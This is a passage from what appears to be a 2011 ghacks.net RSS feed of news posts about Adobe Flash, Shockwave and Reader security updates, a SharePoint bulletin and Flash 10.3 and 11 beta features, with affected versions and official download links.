href="http://technet.microsoft.com/en-us/security/bulletin/ms11-074">MS11-074</a> &#8211; Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (2451858) &#8211; This security update resolves five privately reported vulnerabilities and one publicly disclosed vulnerability in Microsoft SharePoint and Windows SharePoint Services. The most severe vulnerabilities could allow elevation of privilege if a user clicked on a specially crafted URL or visited a specially crafted Web site. For the most severe vulnerabilities, Internet Explorer 8 and Internet Explorer 9 users browsing to a SharePoint site in the Internet Zone are at a reduced risk because, by default, the XSS Filter in Internet Explorer 8 and Internet Explorer 9 helps to block the attacks in the Internet Zone. The XSS Filter in Internet Explorer 8 and Internet Explorer 9, however, is not enabled by default in the Intranet Zone.</li></ul><p>You find deployment priority information and the severity index <a
href="http://blogs.technet.com/b/msrc/archive/2011/09/13/more-on-diginotar-certificates-and-september-bulletins.aspx">at the</a> Technet blog.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/09/13/microsoft-adobe-ready-security-updates/feed/</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>Adobe Security Updates August 2011</title><link>http://www.ghacks.net/2011/08/10/adobe-security-updates-august-2011/</link> <comments>http://www.ghacks.net/2011/08/10/adobe-security-updates-august-2011/#comments</comments> <pubDate>Wed, 10 Aug 2011 12:35:27 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe flash player]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[flash player update]]></category> <category><![CDATA[security bulletin]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=48865</guid> <description><![CDATA[Adobe has synced their security release schedule with that of Microsoft. It is therefor not surprising that the company announced yesterday the availability of security updates for several of their products. Security updates were released for Adobe Shockwave Player, Flash Media Server, Adobe Flash Player, Adobe Photoshop CS5 and RoboHelp. All security issues have received [...]]]></description> <content:encoded><![CDATA[<p>Adobe has synced their security release schedule with that of Microsoft. It is therefor not surprising that the company announced yesterday the availability of security updates for several of their products. Security updates were released for Adobe Shockwave Player, Flash Media Server, Adobe Flash Player, Adobe Photoshop CS5 and RoboHelp.</p><p>All security issues have received the maximum severity rating of critical, with the exception of the one for RoboHelp which received one of important instead.</p><p>The Flash Player update fixes several critical vulnerabilities in all Adobe Flash Player versions for Windows, Macintosh, Linux, Solaris and Android. Versions that are affected by the vulnerability are Flash Player 1.0.3.181.36 and earlier on all supported systems (Android 10.3.185.25 and earlier).</p><p>A successful exploit of a vulnerability could cause a crash and the successful taking control of the system in the process.</p><p>Adobe recommends that all users update Adobe Flash Player as soon as possible to protect their operating system and data from exploits.</p><p>The latest version of Adobe Flash Player can be downloaded <a
href="http://get.adobe.com/flashplayer/">from</a> Adobe&#8217;s Download Center or in the case of Android from the Android Marketplace.</p><p>Windows users can furthermore use the Flash Player Settings Manager that is part of the Windows Control Panel to check for updates. Here it is furthermore possible to check the Flash Player version that is installed on the system. The path is Control Panel > Flash Player (32-bit) > Advanced. Users with a 64-bit version of Flash Player installed need to change the 32-bit to 64-bit in the path.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/08/adobe-flash-player-settings-manager.png"><img
src="http://www.ghacks.net/wp-content/uploads/2011/08/adobe-flash-player-settings-manager.png" alt="adobe-flash-player-settings-manager" title="adobe-flash-player-settings-manager" width="475" height="430" class="alignnone size-full wp-image-48867" /></a></p><p>Additional information <a
href="http://www.adobe.com/support/security/bulletins/apsb11-21.html">about the</a> Flash Player vulnerabilities are available on Adobe&#8217;s security bulletin page.</p><p>Google Chrome users, who do not have Flash installed separately, have received an update by now that has updated their internal version of Flash to the latest version.</p><p>Happy updating everyone.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/08/10/adobe-security-updates-august-2011/feed/</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Flash 11 Beta Brings 64-Bit Support To Windows</title><link>http://www.ghacks.net/2011/07/14/flash-11-beta-brings-64-bit-support-to-windows/</link> <comments>http://www.ghacks.net/2011/07/14/flash-11-beta-brings-64-bit-support-to-windows/#comments</comments> <pubDate>Thu, 14 Jul 2011 12:52:18 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[Mac]]></category> <category><![CDATA[Windows]]></category> <category><![CDATA[adobe flash]]></category> <category><![CDATA[flash]]></category> <category><![CDATA[flash beta]]></category> <category><![CDATA[flash player]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=47806</guid> <description><![CDATA[Adobe has recently released the first beta version of the upcoming Adobe Flash 11 version. The beta is publicly available, specifically for testing purposes and developers who want to integrate the new features into their applications. Probably the biggest new feature in the beta is native 64-bit support for 64-bit Windows operating systems. While still [...]]]></description> <content:encoded><![CDATA[<p>Adobe has recently released the first beta version of the upcoming Adobe Flash 11 version. The beta is publicly available, specifically for testing purposes and developers who want to integrate the new features into their applications.</p><p>Probably the biggest new feature in the beta is native 64-bit support for 64-bit Windows operating systems. While still in beta, it marks a milestone in the 64-bit development of Flash, as the beta release indicates that 64-bit support might be added to the final version of Flash 11.</p><p>Users with the intention to download the 64-bit version of Flash beta need to know that it can only be run in a 64-bit web browser. That&#8217;s Internet Explorer mostly, and some custom compiled versions of the Firefox web browser. Users who run a 64-bit browser can install the 64-bit version of Flash normally on their system, provided that it is a 64-bit operating system as well. To sum it up: You need a 64-bit OS, a 64-bit web browser to install the 64-bit version of Flash 11 Beta.</p><p>What else is new in Flash 11? Adobe <a
href="http://labs.adobe.com/downloads/flashplayer11.html">lists</a> the following features on the Adobe Labs page: Stage3D APIs, G.711 audio compression for telephone, H264/AVC SW Encoding, Socket Progress Events and HD Surround Sound.</p><blockquote><p>Adobe® Flash® Player 11 desktop beta drives innovation for rich, engaging digital experiences with new features for cross-platform browser-based viewing of expressive rich internet applications, content, and videos across devices. Some of the features from the Flash Player Incubator, such as Stage 3D and 64-bit support, have been moved into this beta release.</p></blockquote><p>While useful to some users, they might not be relevant for the majority of Flash users at this point in time. Flash 11 Beta could be more interesting to developers who may have plans to integrate one or some of the new features into their applications.</p><p>Interested users can download 32-bit and 64-bit editions of Flash 11 Beta <a
href="http://labs.adobe.com/downloads/flashplayer11.html">from the</a> Adobe website. The new version is available for Windows, Linux and Macintosh computer systems. The download page links to 32bit and 64bit Flahs uninstallers, for users who need to go back to version 10 of Flash.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/07/14/flash-11-beta-brings-64-bit-support-to-windows/feed/</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Adobe Patch Day Brings Fixes For Flash, Shockwave And Adobe Reader</title><link>http://www.ghacks.net/2011/06/15/adobe-patch-day-brings-fixes-for-flash-shockwave-and-adobe-reader/</link> <comments>http://www.ghacks.net/2011/06/15/adobe-patch-day-brings-fixes-for-flash-shockwave-and-adobe-reader/#comments</comments> <pubDate>Wed, 15 Jun 2011 07:42:39 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[companies]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe]]></category> <category><![CDATA[adobe reader]]></category> <category><![CDATA[adobe security]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[patch day]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=46489</guid> <description><![CDATA[Microsoft had a huge patch day yesterday with 16 security bulletins for the Windows operating system, Microsoft Office, Internet Explorer and other Microsoft software. Adobe, the company behind popular technologies such as Flash Player, Shockwave or Adobe Reader released five security bulletins on the same day after teaming up with Microsoft to coordinate security releases.. [...]]]></description> <content:encoded><![CDATA[<p>Microsoft had a huge <a
href="http://www.ghacks.net/2011/06/14/microsoft-patch-day-june-2011-overview/">patch day</a> yesterday with 16 security bulletins for the Windows operating system, Microsoft Office, Internet Explorer and other Microsoft software.</p><p>Adobe, the company behind popular technologies such as Flash Player, Shockwave or Adobe Reader released five security bulletins on the same day after <a
href="http://www.ghacks.net/2010/07/29/adobe-microsoft-to-team-up-on-vulnerability-sharing/">teaming up with Microsoft</a> to coordinate security releases.. Of the five, three may be affecting end users as they address vulnerabilities in Adobe Reader and Acrobat, Shockwave Player and Flash Player. All three have received a maximum severity rating of critical, the highest possible rating.</p><p>The bulletin <a
href="http://www.adobe.com/support/security/bulletins/apsb11-16.html">APSB11-16</a> describes a critical vulnerability in Adobe Reader X 10.0.3 and earlier on Windows, and Adobe Reader X 10.0.3 and earlier on Macintosh, as well as earlier versions of Adobe Reader 9 and 8, and Adobe Acrobat 9 and 8. The vulnerability could be exploited by attackers to crash the application to take control of the computer system Adobe Reader X is running on.</p><p>Adobe recommends to update the software product to the latest available version. For Adobe Reader X that would mean to update to version 10.1, for users of Adobe Reader 9.4.4 and earlier to update to version 9.4.5.</p><p><img
src="http://www.ghacks.net/wp-content/uploads/2011/06/adobe-reader-x.png" alt="adobe-reader-x" title="adobe-reader-x" width="600" height="449" class="alignnone size-full wp-image-46493" /></p><p>Adobe Reader and Acrobat users can check for updates in the program interface. This is done via Help > Check for Updates. Updates can also be downloaded from the following locations.</p><ul><li><a
href="http://www.adobe.com/support/downloads/product.jsp?product=10&#038;platform=Windows.">Adobe Reader Windows</a></li><li><a
href="http://www.adobe.com/support/downloads/product.jsp?product=10&#038;platform=Macintosh.">Adobe Reader Macintosh</a></li></ul><p>You can also check out <a
href="http://www.ghacks.net/2010/11/22/adobe-reader-x-offline-installers/">Adobe Reader X Offline Installers</a></p><p>Security Bulletin <a
href="http://www.adobe.com/support/security/bulletins/apsb11-17.html">APSB11-17</a> describes vulnerabilities in Adobe Shockwave Player 11.5.9.620 and earlier on the Windows and Macintosh platform. Attackers who successfully exploit the vulnerabilities could run malicious code on the computer system. Adobe recommends to update Shockwave Player to version 11.6.0.626 to protect the system from possible exploits.</p><p>Windows and Mac users who run Shockwave Player on their system can download the latest version <a
href="http://get.adobe.com/shockwave/">at the official</a> download site.</p><p>Bulletin <a
href="http://www.adobe.com/support/security/bulletins/apsb11-18.html">APSB11-18</a> finally describes a vulnerability in Adobe Flash Player that affects Adobe Flash Player 10.3.181.23 and earlier on Windows, Macintosh, Linux and Solaris, as well as Flash Player 10.3.185.23 and earlier for Android.</p><p>The vulnerability could be exploited to cause a crash which could allow the attacker to gain control over the affected system. Adobe has confirmed reports that the vulnerability is exploited in the wild in the form of targeted attacks on specifically prepared websites.</p><p>Adobe recommends to update Flash Player to Adobe Flash Player 10.3.181.26 on desktop operating systems. Android users will receive a patch before week&#8217;s end.</p><p>Users can verify their installed version of Flash Player by visiting the <a
href="http://www.adobe.com/products/flash/about/">About Flash Player</a> page at Adobe.</p><p><img
src="http://www.ghacks.net/wp-content/uploads/2011/06/flash-player-version.png" alt="flash player version" title="flash player version" width="600" height="512" class="alignnone size-full wp-image-46490" /></p><p>Adobe lists the latest version for all supported operating systems on the page, so that users only need to compare their installed version with the latest available version to see if they need to update.</p><p>The latest versions can be downloaded from <a
href="http://get.adobe.com/flashplayer/">Adobe&#8217;s Flash Player Download Center</a>.  Users who do not want to use the download manager can check out this guide D<a
href="http://www.ghacks.net/2010/02/27/download-adobe-flash-without-adobe-download-manager/">ownload Adobe Flash Without Adobe Download Manager</a>.</p><p>Google Chrome users can check for updates in Chrome to get the latest version. This is done by clicking on the wrench icon and selecting About Google Chrome.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/06/15/adobe-patch-day-brings-fixes-for-flash-shockwave-and-adobe-reader/feed/</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Adobe Flash Player 10.3 Final Downloads</title><link>http://www.ghacks.net/2011/05/13/adobe-flash-player-10-3-final-downloads/</link> <comments>http://www.ghacks.net/2011/05/13/adobe-flash-player-10-3-final-downloads/#comments</comments> <pubDate>Fri, 13 May 2011 07:27:48 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[companies]]></category> <category><![CDATA[adobe flash]]></category> <category><![CDATA[flash]]></category> <category><![CDATA[flash player 10.3]]></category> <category><![CDATA[flash update]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=45091</guid> <description><![CDATA[The integration of Adobe Flash Player 10.3 in the latest Google Chrome Stable release yesterday hinted already at the imminent release of the final version of Flash Player 10.3. This time, it took less than 24 hours; Adobe has enabled downloads for all supported operating systems, so that users can download and install Flash Player [...]]]></description> <content:encoded><![CDATA[<p>The integration of Adobe Flash Player 10.3 in the latest <a
href="http://www.ghacks.net/2011/05/12/google-chrome-stable-security-update-11-0-696-68-released/">Google Chrome Stable</a> release yesterday hinted already at the imminent release of the final version of Flash Player 10.3. This time, it took less than 24 hours; Adobe has enabled downloads for all supported operating systems, so that users can download and install Flash Player 10.3 on their computer systems.</p><p>We have covered all new features of <a
href="http://www.ghacks.net/2011/03/08/a-close-look-at-adobe-flash-player-10-3-beta/">Flash Player 10.3</a> when the first beta was released in March, and those information are still valid.</p><p>Adobe Flash Player 10.3.181.14 fixes several security issues, next to the new features that have been added by Adobe.</p><p>The vulnerabilities affect all supported operating systems and have received a critical rating by Adobe. Users are encouraged to update their version of Flash to the new release as soon as possible.</p><blockquote><p>Critical vulnerabilities have been identified in Adobe Flash Player 10.2.159.1 and earlier versions (Adobe Flash Player 10.2.154.28 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.2.157.51 and earlier versions for Android. These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system. There are reports of malware attempting to exploit one of the vulnerabilities, CVE-2011-0627, in the wild via a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment targeting the Windows platform. However, to date, Adobe has not obtained a sample that successfully completes an attack. (<a
href="http://www.adobe.com/support/security/bulletins/apsb11-12.html">via</a>)</p></blockquote><p>The new handling of so called Flash cookies in web browsers is probably the most important feature from an end-user&#8217;s perspective. Before Flash Player 10.3, you were not able to delete those cookies from within the browser interface. Even if you&#8217;d select to delete all cookies, you&#8217;d only delete HTTP cookies and not cookies created by Flash.</p><p>With the new system in place, browser developers can integrate the cleaning of Flash cookies right into the temporary files and history cleaning of the web browser.</p><p>Another interesting addition is the integration of Flash Player in the operating system&#8217;s Control Panel. Windows, Mac and Linux users find a Flash entry in the control panel which they can use to configure Adobe&#8217;s Flash Player.</p><p><img
src="http://www.ghacks.net/wp-content/uploads/2011/05/flash-player-settings-manager.png" alt="flash player settings manager" title="flash player settings manager" width="471" height="426" class="alignnone size-full wp-image-45092" /></p><p>Users can make use of the new settings manager to manage local storage settings, camera and microphone permissions and peer-assisted networking permissions. It furthermore can be used to check for updates manually, and block the automatic update checks.</p><p>A delete all button is offered under Browsing Data and Settings which removes all Flash related settings and data across all browsers on the computer.</p><p><strong>Flash Player 10.3 Direct Download Links</strong></p><li>Flash Player 10.3 Internet Explorer [<a
href="http://fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_10_active_x.exe">link</a>]</li><li>Flash Player 10.3 Other browsers [link]</li><li>Flash Player 10.3 Mac OSX [link]</li><li>Flash Player 10.3 Linux [link]</li><p>You can download Flash <a
href="http://get.adobe.com/flashplayer/">from the</a> official Get Adobe Flash website as well.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/05/13/adobe-flash-player-10-3-final-downloads/feed/</wfw:commentRss> <slash:comments>10</slash:comments> </item> <item><title>Adobe Releases Flash Player Security Update</title><link>http://www.ghacks.net/2011/04/15/adobe-releases-flash-player-security-update/</link> <comments>http://www.ghacks.net/2011/04/15/adobe-releases-flash-player-security-update/#comments</comments> <pubDate>Fri, 15 Apr 2011 20:01:03 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe]]></category> <category><![CDATA[adobe flash player]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[flash player update]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=43981</guid> <description><![CDATA[Adobe has released an update for Adobe Flash Player that fixes a critical security issue in the application that had been discovered earlier this month. The Google Chrome browser was the first that received a patch yesterday, followed today by all Flash Player versions for the web browsers that rely on a Flash installation and [...]]]></description> <content:encoded><![CDATA[<p>Adobe has released an update for Adobe Flash Player that fixes a <a
href="http://www.ghacks.net/2011/04/12/here-we-go-again-yet-another-flash-0-day-vulnerability-emerges/">critical security issue</a> in the application that had been discovered earlier this month. The <a
href="http://www.ghacks.net/2011/04/14/google-chrome-stable-security-update-april-2011/">Google Chrome</a> browser was the first that received a patch yesterday, followed today by all Flash Player versions for the web browsers that rely on a Flash installation and load a Flash plugin to display Flash contents as well as Adobe Air.</p><p>The vulnerability, according to Adobe&#8217;s information could be exploited to cause a crash on the user system that could allow the attacker to take control of the operating system. Reports that the vulnerability is actively exploited by embedding specifically prepared Flash files in Word and Excel documents have been confirmed by Adobe.</p><blockquote><p>There are reports that this vulnerability is being exploited in the wild in targeted attacks via a malicious Web page, or a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment, targeting the Windows platform</p></blockquote><p>Google Chrome users do not need to update Adobe Flash  unless they have Flash installed separately on their system as well. This can for instance be the case if other web browsers are used or installed on the system as well.</p><p>The easiest way to find out if your Flash Player is up to date is to visit the <a
href="http://www.adobe.com/software/flash/about/">About Flash</a> page over at Adobe. The currently installed version and the latest version are displayed on that page.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/04/adobe-flash-player.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2011/04/adobe-flash-player-550x437.jpg" alt="adobe flash player" title="adobe flash player" width="550" height="437" class="alignnone size-medium wp-image-43982" /></a></p><p>Downloads are provided <a
href="http://get.adobe.com/flashplayer/">at the</a> Flash Player Download page which automatically displays the correct download for the browser used to open the web page, or by manually downloading the Flash Player updates <a
href="http://www.adobe.com/support/flashplayer/downloads.html">from the</a> Flash Player Support Center.</p><p>Flash Player versions affected by the vulnerability are the following:</p><blockquote><p>Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux, and Solaris operating systems<br
/> Adobe Flash Player 10.2.154.25 and earlier versions for Chrome users<br
/> Adobe Flash Player 10.2.156.12 and earlier for Android<br
/> Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux</p></blockquote><p>The now released update of Adobe Flash Player is version 10.2.159.1 on all supported operating systems, and 10.2.154.27 if the Flash version of the Google Chrome browser is checked.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/04/15/adobe-releases-flash-player-security-update/feed/</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>Here We Go Again: Yet Another Flash 0-day Vulnerability Emerges</title><link>http://www.ghacks.net/2011/04/12/here-we-go-again-yet-another-flash-0-day-vulnerability-emerges/</link> <comments>http://www.ghacks.net/2011/04/12/here-we-go-again-yet-another-flash-0-day-vulnerability-emerges/#comments</comments> <pubDate>Tue, 12 Apr 2011 09:05:30 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe]]></category> <category><![CDATA[adobe acrobat]]></category> <category><![CDATA[adobe flash]]></category> <category><![CDATA[adobe reader]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[flash vulnerability]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=43815</guid> <description><![CDATA[Flash player users, which is the majority of Internet users, do not come to rest in past years. There is seldom a month passing by without another Flash vulnerability. Adobe today released a security advisory warning for all Flash users that describes a critical security vulnerability in the popular software. Affected are more or less [...]]]></description> <content:encoded><![CDATA[<p>Flash player users, which is the majority of Internet users, do not come to rest in past years. There is seldom a month passing by without another Flash vulnerability. Adobe today released a security advisory warning for all Flash users that describes a critical security vulnerability in the popular software.</p><p>Affected are more or less all Flash users. This includes Flash installations on Windows, Mac and Linux, the built-in Flash Player of the Google Chrome browser, Flash on Android and Flash in Adobe Reader and Acrobat.</p><ul><li>Flash Player 10.2.153.1 and earlier versions on Windows, Mac, Linux, Solaris</li><li>Adobe Flash Player 10.2.154.25 and earlier for Chrome</li><li>Adobe Flash Player 10.2.156.12 and earlier versions for Android</li><li>Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems</li></ul><p>Adobe confirmed reports that the vulnerability is actively exploited. The vulnerability uses embedded Flash files in Microsoft Word documents to exploit the issue. According to Adobe&#8217;s information those are delivered as email attachments and targeting the Windows platform.</p><p>Adobe Reader and Acrobat do not appear to be targeted right now. Adobe Reader X users are protected from this exploit by the program&#8217;s Protected Mode.</p><p>Adobe is currently finalizing a schedule for delivering updates for all affected versions of Flash Player except for Adobe Reader X which will receive the update on the next quarterly security update on June 14, 2011.</p><p>How can users protect their system from these kind of attacks? You should be cautious when you receive document attachments, especially if they come from unknown senders. Probably the best option in this case is to save those attachments to the computer, and open them in an online viewer such as Google Docs.</p><p>You could alternatively use a third party document viewer that does not support Flash, but the safest bet is an online viewer.</p><p>Interested users find <a
href="http://www.adobe.com/support/security/advisories/apsa11-02.html">additional information</a> about the newly discovered Flash vulnerability at the Adobe Security Bulletin.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/04/12/here-we-go-again-yet-another-flash-0-day-vulnerability-emerges/feed/</wfw:commentRss> <slash:comments>10</slash:comments> </item> <item><title>Adobe Security Updates For Flash, Adobe Reader</title><link>http://www.ghacks.net/2011/03/22/adobe-security-updates-for-flash-adobe-reader/</link> <comments>http://www.ghacks.net/2011/03/22/adobe-security-updates-for-flash-adobe-reader/#comments</comments> <pubDate>Tue, 22 Mar 2011 09:33:04 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe flash]]></category> <category><![CDATA[adobe reader]]></category> <category><![CDATA[adobe security]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=42914</guid> <description><![CDATA[Adobe has released updates for their popular Adobe Flash Player, Adobe Reader and Adobe Acrobat applications. The updates address a critical security vulnerability that was discoveredearlier this month. The critical vulnerability affects Adobe Flash, and since Adobe implemented Flash technology in Adobe Reader and Acrobat, those products as well. The Flash vulnerability affects all Adobe [...]]]></description> <content:encoded><![CDATA[<p>Adobe has released updates for their popular Adobe Flash Player, Adobe Reader and Adobe Acrobat applications. The updates address a critical security vulnerability that <a
href="http://www.ghacks.net/2011/03/14/new-critical-0-day-flash-vulnerability-exploited-via-excel-attachments/">was discovered</a>earlier this month.</p><p>The critical vulnerability affects Adobe Flash, and since Adobe implemented Flash technology in Adobe Reader and Acrobat, those products as well.</p><p>The Flash vulnerability affects all Adobe Flash Player 10.2.152.33 and earlier versions on all supported operating systems, as well as Flash Player 10.2.154.18 and earlier for Chrome, Flash Player 10.1.106.16 and earlier for Android and Adobe AIR 2.5 and earlier. Google recently pushed an update that resolved the vulnerability for Chrome.</p><p>Attackers can exploit the vulnerability to cause a crash which could allow them to take control over the affected system. We already mentioned in our first report on March 14 that the issue was actively exploited by attackers in the form of embedded Flash files in Microsoft Excel documents that were delivered as email attachments.</p><p>The Flash Player update <a
href="http://www.adobe.com/support/security/bulletins/apsb11-05.html">is available</a> on the official Flash download page over at Adobe. Google Chrome users with automatic updates enabled do not need to download the update as Google has already pushed an update to all Chrome users that updated Flash to the latest version.</p><p>The new Flash version is 10.2.153.1 for all supported desktop PCs, 10.2.156.12 for Android and 10.2.154.25 for Google Chrome.</p><p><img
src="http://www.ghacks.net/wp-content/uploads/2011/03/adobe-flash-player.png" alt="adobe flash player" title="adobe flash player" width="335" height="108" class="alignnone size-full wp-image-42917" /></p><p>Adobe AIR users can download the new version of the application <a
href="http://get.adobe.com/air/">from the</a> official Adobe AIR download center, the new Adobe Air version is 2.6.</p><p>Users <a
href="http://www.adobe.com/software/flash/about/">can verify</a> their version of Adobe Flash by visiting the About Adobe Flash Player page.</p><p>The Security Bulletin that lists additional information is accessible <a
href="http://www.adobe.com/support/security/bulletins/apsb11-05.html">here</a>.</p><p>Adobe has released an update for Adobe Reader and Acrobat as well to address the same critical security vulnerability. Adobe Reader and Acrobat X, 10.x and 9.x are affected on Windows and Macintosh systems.</p><p>Existing Adobe Reader and Adobe Acrobat users can use the built-in updating functionality to update the software to the latest version. They need to open Adobe Reader and select Help > Check for Updates from the menu to initiate that process.</p><p>It needs to be noted that Adobe is not supplying an update for Adobe Reader X at this point in time. The reasoning is that Adobe Reader X is using Protected Mode which &#8220;would prevent an exploit of this kind from executing&#8221;. The update will be addressed on the coming quarterly security update which is scheduled for June 14.</p><p>The security bulletin <a
href="http://www.adobe.com/support/security/bulletins/apsb11-06.html">lists</a> additional information about the vulnerability, and download links that point to the latest program versions of affected applications.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/03/22/adobe-security-updates-for-flash-adobe-reader/feed/</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>New Critical 0-day Flash Vulnerability Exploited Via Excel Attachments</title><link>http://www.ghacks.net/2011/03/14/new-critical-0-day-flash-vulnerability-exploited-via-excel-attachments/</link> <comments>http://www.ghacks.net/2011/03/14/new-critical-0-day-flash-vulnerability-exploited-via-excel-attachments/#comments</comments> <pubDate>Mon, 14 Mar 2011 19:46:36 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe acrobat]]></category> <category><![CDATA[adobe flash]]></category> <category><![CDATA[adobe reader]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[security vulnerability]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=42506</guid> <description><![CDATA[Adobe today has released a new security advisory for Adobe Flash Player, Adobe Reader and Acrobat. All three applications are affected by a critical 0-day vulnerability that is exploited via Excel email attachments. Vulnerable versions are Adobe Flash Player 10.2.154.33 and earlier for all supported desktop operating systems, Adobe Flash Player 10.1.106.16 and earlier for [...]]]></description> <content:encoded><![CDATA[<p>Adobe today has released a new security advisory for Adobe Flash Player, Adobe Reader and Acrobat. All three applications are affected by a critical 0-day vulnerability that is exploited via Excel email attachments. Vulnerable versions are Adobe Flash Player 10.2.154.33 and earlier for all supported desktop operating systems, Adobe Flash Player 10.1.106.16 and earlier for Android and Adobe Reader and Acrobat X, 10.x and 9.x for Windows and Macintosh.</p><p>Adobe has confirmed reports that the vulnerability is actively exploited via swf files that are embedded in Microsoft Excel files that are delivered via email attachments. A successful exploit causes a crash of the application and could give an attacker control over the computer system.</p><p>A security fix is in the final stages of development, and Adobe estimates that it can be distributed during the next week. Computer users for now should be very cautious when they receive emails with Excel attachments, especially if the sender is unknown. It may be a good idea to open the documents online, for instance via Google Docs instead of a desktop client to block potential attacks.</p><p>Protected Mode of Adobe Reader X mitigates the issue according to Adobe, so that the security fix for that version will be delivered with the quarterly security update that is scheduled for June 14.</p><p>In short:</p><ul><li>All Flash Player versions 10 are affected for all supported desktop and mobile operating systems.</li><li>All versions of Adobe Reader and Acrobat X, 10 and 9 are affected</li><li>The vulnerability is exploited via Excel email attachments that have a Flash file embedded.</li><li>A patch will be delivered in the next week</li></ul><p>Additional information are available at the <a
href="http://www.adobe.com/support/security/advisories/apsa11-01.html">Security Advisory</a> over at Adobe&#8217;s website.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/03/14/new-critical-0-day-flash-vulnerability-exploited-via-excel-attachments/feed/</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>A Close Look At Adobe Flash Player 10.3 Beta</title><link>http://www.ghacks.net/2011/03/08/a-close-look-at-adobe-flash-player-10-3-beta/</link> <comments>http://www.ghacks.net/2011/03/08/a-close-look-at-adobe-flash-player-10-3-beta/#comments</comments> <pubDate>Tue, 08 Mar 2011 10:24:17 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[adobe flash player]]></category> <category><![CDATA[flash player]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=42240</guid> <description><![CDATA[Adobe&#8217;s Flash Player is one of the most installed technologies on desktop computer systems. Adobe estimates that more than 99% of Internet viewers have Flash installed on their system. Criticism of Adobe Flash, and Adobe&#8217;s handling of Flash related issues, has risen in past years. Major points of criticism include private and security related issues [...]]]></description> <content:encoded><![CDATA[<p>Adobe&#8217;s Flash Player is one of the most installed technologies on desktop computer systems. Adobe estimates that more than 99% of Internet viewers have Flash installed on their system. Criticism of Adobe Flash, and Adobe&#8217;s handling of Flash related issues, has risen in past years. Major points of criticism include private and security related issues or the missing support for 64-bit software.</p><p>Adobe Flash&#8217;s dominant position lately has become under attack by new emerging technologies. The rise of HTML5, and supported technologies, could seriously impact the dominance of Flash in coming years.</p><p>Adobe as a response has increased their efforts to improve the Flash Player. The latest development version, Adobe Flash Player 10.3 Beta, has been made available recently for all supported operating systems.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/03/adobe-fllash-player-103.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2011/03/adobe-fllash-player-103.jpg" alt="adobe fllash player 103" title="adobe fllash player 103" width="491" height="308" class="alignnone size-full wp-image-42242" /></a></p><p>Flash Player 10.3 Beta introduces several new features, of which at least two have been requested by privacy conscious users for a very long time.</p><p>Adobe&#8217;s introductory page <a
